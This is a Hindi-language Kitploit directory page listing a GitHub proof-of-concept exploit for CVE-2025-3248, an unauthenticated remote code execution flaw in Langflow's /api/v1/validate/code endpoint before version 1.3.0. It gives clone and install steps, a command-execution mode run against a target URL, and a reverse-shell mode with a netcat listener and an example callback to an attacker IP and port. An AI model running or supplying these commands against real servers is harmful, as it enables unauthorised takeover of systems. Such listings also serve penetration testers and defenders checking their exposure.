Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
langflow-exploit — CVE-2025-3248 के लिए PoC: Langflow < 1.3.0 में /api/v1/validate/code के माध्यम से बिना प्रमाणीकरण के RCE। | Kitploit
उपकरण/GitHubGitHub/preemware/langflow-exploit
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubpreemware/langflow-exploit

langflow-exploit

CVE-2025-3248 के लिए PoC: Langflow < 1.3.0 में /api/v1/validate/code के माध्यम से बिना प्रमाणीकरण के RCE।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3248 - Langflow कोड सत्यापन एंडपॉइंट RCE

Langflow के कोड सत्यापन एंडपॉइंट में रिमोट कोड निष्पादन भेद्यता को प्रदर्शित करने वाला एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। यह भेद्यता Langflow के 1.3.0 से पहले के संस्करणों को प्रभावित करती है, जिससे बिना प्रमाणीकरण के हमलावर क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमाना कोड निष्पादित कर सकते हैं।

भेद्यता विवरण

  • CVE आईडी: CVE-2025-3248
  • प्रभावित संस्करण: < 1.3.0
  • हमला वेक्टर: दूरस्थ
  • प्रमाणीकरण आवश्यक: नहीं
  • प्रभाव: रिमोट कोड निष्पादन (RCE)
  • एंडपॉइंट: /api/v1/validate/code

पूर्वापेक्षाएँ

  • Python 3.x
  • आवश्यक Python पैकेज:
    • requests
    • colorama

स्थापना

  1. रिपॉजिटरी क्लोन करें:
root@kitploit:~
git clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
  1. निर्भरताएँ इंस्टॉल करें:
root@kitploit:~
pip install requests colorama

उपयोग

यह एक्सप्लॉइट ऑपरेशन के दो तरीकों का समर्थन करता है:

1. कमांड निष्पादन मोड

लक्ष्य सिस्टम पर एक एकल कमांड निष्पादित करें:

root@kitploit:~
python3 cve-2025-3248.py cmd <target_url> "<command>"

उदाहरण:

root@kitploit:~
python3 cve-2025-3248.py cmd http://target:7860 "id"

2. रिवर्स शेल मोड

एक इंटरैक्टिव रिवर्स शेल प्रारंभ करें:

  1. पहले, अपनी मशीन पर एक लिसनर शुरू करें:
root@kitploit:~
nc -lvnp 4444
  1. फिर एक्सप्लॉइट चलाएँ:
root@kitploit:~
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>

उदाहरण:

root@kitploit:~
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444
टूल डाउनलोड करें